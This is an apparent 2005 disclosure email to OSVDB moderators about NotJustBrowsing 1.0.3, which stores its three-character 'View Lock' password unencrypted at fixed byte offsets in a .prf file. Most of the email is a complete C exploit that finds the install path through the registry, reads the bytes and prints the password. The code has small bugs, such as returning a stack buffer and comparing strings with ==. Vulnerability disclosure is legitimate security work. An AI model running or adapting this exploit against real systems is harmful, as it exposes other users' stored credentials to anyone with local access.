From: kozan@netmagister.com
To: moderators@osvdb.org
Date: Wed, 27 Apr 2005 23:29:57 +0300
Subject: NotJustBrowsing 1.0.3 discloses passwords to local users.

---------------------
Application:
---------------------

NotJustBrowsing 1.0.3

---------------------
Introduction:
---------------------

Vendor: www.NotJustBrowsing.com

Vendor Description: Drag and drop for visited links collection. Browsing
signals represented in color codes. View multiple pages in tiled-windows,
in a layout of your choice. Configurable visual representation for group
of URL links. Add notes with stored links. Share multiple Web links with
other users. Pop-ups blocking. Publish user guides, manuals, and help
contents. View lock: protect your stored Web links from being visited by
someone else. Protection: not let any body else modify your stored Web page
links. The ability to have multiple home pages. Each home position can be a
single document link or multiple documents collection. History as a collection
of ‘typed’ and ‘linked’ visits. Version 1.0.3 includes
configurable visual
representation for group of URL links (called ‘front cover’)

---------------------
Bug:
---------------------

NotJustBrowsing 1.0.3 stores "View Lock Password" (this is a three characters
pass.)
in "\\Program Files\NetLeaf Limited\NotJustBrowsing\notjustbrowsing.prf"
in plain text format without crypting and can be viewed by a local user
with a hex editor.

"notjustbrowsing.prf" password storing algorithm:

5. byte = 1. char of password
6. byte = 2. char of password
7. byte = 3. char of password

---------------------
Vendor Confirmed:
---------------------

No.

---------------------
Fix:
---------------------

There is no solution at the time of this entry.

---------------------
Exploit:
---------------------


/*****************************************************************

NotJustBrowsing 1.0.3 Local Password Disclosure Exploit by Kozan

Application: NotJustBrowsing 1.0.3
Procuder: www.notjustbrowsing.com
Vulnerable Description: NotJustBrowsing 1.0.3 discloses passwords
to local users.

Discovered & Coded by Kozan
Credits to ATmaCA
www.netmagister.com - www.spyinstructors.com
kozan@netmagister.com

*****************************************************************/

#include <stdio.h>
#include <windows.h>


HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;


char *bilgi_oku(int adres,int uzunluk)
{
	if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
					"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
					0,
					KEY_QUERY_VALUE,
					&hKey
					) == ERROR_SUCCESS)
	{

	lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,(LPBYTE) prgfiles,
&dwBufLen);
	if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
	{
		RegCloseKey(hKey);
		return NULL;
	}
	RegCloseKey(hKey);

	strcat(prgfiles,"\\NetLeaf Limited\\NotJustBrowsing\\notjustbrowsing.prf");

	int i;
	FILE *fp;
	char ch[100];
	if((fp=fopen(prgfiles,"rb")) == NULL)
	{
		return "NOTINSTALLED";
	}
	fseek(fp,adres,0);
	for(i=0;i<uzunluk;i++)
	ch[i]=getc(fp);
	ch[i]=NULL;
	fclose(fp);
	return ch;
	}
}

int main()
{
	printf("NotJustBrowsing 1.0.3 Local Password Disclosure Exploit by Kozan\n");
	printf("Credits to ATmaCA\n");
	printf("www.netmagister.com - www.spyinstructors.com\n");
	printf("kozan@netmagister.com\n\n");
	if(bilgi_oku(4,3)==NULL)
	{
		printf("An error occured!\n");
		return -1;
	}
	if(bilgi_oku(4,3)=="NOTINSTALLED")
	{
		printf("NotJustBrowsing 1.0.3 is not installed on your system!\n");
		return -1;
	}
	printf("View Lock Password: %s",bilgi_oku(4,3));
	return 0;
}




Kozan...